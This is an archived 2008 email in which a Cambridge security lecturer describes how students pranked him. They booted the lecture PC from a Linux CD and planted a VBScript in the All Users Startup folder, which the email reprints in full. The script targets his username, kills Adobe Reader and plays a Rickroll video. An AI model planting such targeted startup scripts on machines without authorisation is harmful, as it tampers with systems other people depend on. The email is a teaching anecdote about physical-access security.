-N  - 683/683: Markus Kuhn            Malware in LT1                                                                                                                     -- ()

Delivery-date: Tue, 20 May 2008 14:02:15 +0100
To: wednesday@cl.cam.ac.uk, security-group@cl.cam.ac.uk
Subject: Malware in LT1
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>

So it seems some of my "Introduction to Security" Part Ib students have
already learned quite a lot in this course: I have been "Rickroll'd"
today half way during the last lecture on the LT1 presentation PC.

http://en.wikipedia.org/wiki/Rickroll


Technical details:

The perpetrators apparently used a Linux boot CD with NTFS driver to
place on the LT1 PC some files into C:\Temp and a link to the following script into
C:\Programs and Settings\All users\Start Menu\Programs\Startup:

--------------------------------------------------------------------------------
Dim WshShell,oExec

Set WSHNetwork = CreateObject("WScript.Network")
strUserName = WSHNetwork.UserName
If strUserName = "mgk25" Then
        WScript.Sleep 600000
        Set WshShell = wscript.createobject("wscript.shell")
        Set Shell = wscript.createobject("Shell.Application")
        'Shell.MinimizeAll

        Set objWMIService = GetObject("Winmgmts:")

        Set colProcessList = objWMIService.ExecQuery _
                ("Select * from Win32_Process where Name = 'AcroRd32.exe'")

        If colProcessList.count > 0 then
        For Each objProcess In colProcessList
                objProcess.Terminate()
        Next
        End If

        Set oExec = WshShell.Exec("C:\temp\vlc\vlc.exe -f --video-on-top --high-priority c:\temp\rickroll.wmv")
End If
--------------------------------------------------------------------------------

So if anyone logs in, this script will checks whether it is me (they had to use
"All users" because my personal settings reside password-protected on
the filer). If so, it then sleeps for 10 min (600 000 ms) before terminating
Adobe Reader and replacing it with the also installed VLC video player
playing the Rick Astley song "Never Gonna Give You Up" (plus some added
subtitles about lessons learned on correct BIOS configuration of
publicly accessible PCs). There is a copy of the played video and other
files at

  /auto/userfiles/mgk25/unix_home/w/teaching/security1/prank-2008/rickroll.wmv
  \\filer\userfiles\mgk25\unix_home\w\teaching\security1\prank-2008\rickroll.wmv

Markus

P.S.: No need to check the security cameras, I have already received two
full confessions ...

-- 
Markus Kuhn, Computer Laboratory, University of Cambridge
http://www.cl.cam.ac.uk/~mgk25/ || CB3 0FD, Great Britain